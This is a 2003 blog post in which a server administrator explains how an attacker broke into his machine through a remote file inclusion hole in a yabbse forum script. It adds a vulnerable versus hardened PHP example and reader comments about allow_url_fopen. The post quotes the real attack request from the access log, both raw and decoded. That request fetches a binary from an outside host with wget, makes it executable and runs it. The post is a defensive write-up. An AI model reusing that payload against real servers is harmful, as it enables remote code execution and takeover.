
Interesting Hacking Ideas

Posted on 28 October 2003 by Demian Turner

In recent months I've attracted the attention of a hacker from Brazil, and until a few days ago this proved to be a real pain in the ass, especially as the exploit he was using doesn't seem to be widely documented on the web.

Finally I managed to close the hole, but only after I had tried all of the following:

  • shut down all non-essential services on RH 7.3
  • shut down FTP
  • reset all passwords
  • removed GCC from my system, as the hacker was gaining access and compiling further C exploits
  • almost having had to change machines!

I was still getting compromised. At first I thought this bastard was just a bot that automatically detected a security hole and sent automated attacks. But recently, looking at his .bash_history, I realised I had a fairly persistent pest on my hands.

Anyway, the security hole ended up being quite simple; I wish I had discovered it earlier. It turns out one of my users was running the http://www.yabbse.org/ forum script, quite possibly one of the most insecure examples of professional PHP programming about. I present the details here in the hope they will help some people write more secure scripts.

The request that the hacker was using to compromise the server was the following:

[root@www logs]# cat access_log | grep spc1
200.138.46.149 - - [25/Oct/2003:16:43:42 -0700] "GET /fishbowl/Sources/Packages.php?sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1" 200 255 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"

Put through a little urldecode, you get:

/fishbowl/Sources/Packages.php?sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir /var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1

Check out the cat.txt, it's an interesting idea. It looks like the yabbse script presented a nice exec() or system() call for anyone to do what they wanted with. I would estimate PHP programmers learn to treat these functions with caution within their first 3 months of exposure to the language, and that's if they have no prior development experience. What's strange is that yabbse, currently in version 1.5.4 with quite a professional website, let this *censored*-up slip through.

Many thanks to Nick Rembis who pointed me in the right direction to closing this hole.
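To make the point concrete, here is an added example (written for this page in modern PHP; it is not yabbse's code) of the file-inclusion pattern that a request like the one above targets, shown next to a hardened version. The function names, the `Packages.php` file name and the base-directory layout are assumed for illustration.

```php
<?php
// Added illustration, not yabbse's code. Shows why a query-string parameter
// such as "sourcedir" must never be used directly to build an include path.

// BEFORE (vulnerable): $sourcedir comes straight from the query string. With
// allow_url_fopen=On (the default in the PHP 4 era), a value like
// "http://attacker.example/cat.txt?" makes PHP fetch that URL and execute it;
// the trailing "?" turns whatever the script appends into a harmless query
// string, so the remote file is loaded as-is.
function load_package_vulnerable(array $get): void
{
    $sourcedir = $get['sourcedir'];
    require $sourcedir . '/Packages.php';   // accepts a remote URL or ../ traversal
}

// AFTER (hardened): user input may only pick a name inside a fixed directory.
// Reject anything but a plain identifier, resolve the path, and check the
// resolved path still lies under the base directory before including it.
function load_package_safe(array $get, string $baseDir): string
{
    $base = realpath($baseDir);
    if ($base === false) {
        throw new RuntimeException('base directory missing');
    }
    $name = $get['sourcedir'] ?? '';
    // Plain directory name only: no slashes, no "..", no URL scheme.
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        throw new InvalidArgumentException('invalid sourcedir');
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    $target = realpath($prefix . $name . DIRECTORY_SEPARATOR . 'Packages.php');
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('Packages.php not found under base directory');
    }
    require $target;
    return $target;   // returned so callers (or tests) can see what was loaded
}

// Defence in depth in php.ini, independent of any script fix:
//   allow_url_fopen   = Off   ; what the comment on this post recommends
//   allow_url_include = Off   ; PHP 5.2+, blocks include/require of URLs even
//                             ; when allow_url_fopen stays on for other uses
```

Even with the script fixed, turning off URL includes at the php.ini level means the next forgotten `include($_GET[...])` in some other user's script cannot pull in remote code.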

2 Comments For This Post

  1. jrust Says:

    Seems more likely that the hole was a fopen() or include() or require() statement (since the exploited variable was sourcedir). That's a common exploit (that got my website once) since the default setting is to allow urls to be opened and executed as if they were being run on the exploited webserver. You may consider turning allow_url_fopen (http://us4.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen) off if you don't need it as it's often hard to analyze every instance of those methods.

  2. demian Says:

    Hi Jason

    Thanks for pointing this out, lost so much time with the hack I couldn't be bothered to look at the code. Will check it out 😉

    cheers

    Demian
